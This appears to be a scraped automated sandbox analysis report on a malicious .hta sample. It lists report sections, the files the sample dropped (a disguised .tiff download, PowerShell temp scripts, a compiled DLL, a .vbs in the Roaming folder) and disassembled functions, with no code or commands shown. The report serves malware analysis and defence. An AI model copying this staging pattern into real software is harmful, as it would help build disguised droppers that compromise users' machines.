Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESA4B4.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5whgs0o.44f.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anngzjj4.lmz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjvukf3k.nju.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g02bl1ve.su3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1rxrwjp.r5z.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfn51xzo.upu.psm1

C:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.0.cs

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.dll

C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.out

C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs

Static File Info

Windows Analysis Report
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta

Function 009D7A18 Relevance: 1.9, APIs: 1, Instructions: 355
COMMON

Function 07091F40 Relevance: 5.4, Strings: 4, Instructions: 392
COMMON

Function 07094610 Relevance: 2.9, Strings: 2, Instructions: 441
COMMON

Function 070904F8 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Function 009D1BA1 Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Function 009D1BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Function 070945AC Relevance: 1.5, Strings: 1, Instructions: 275
COMMON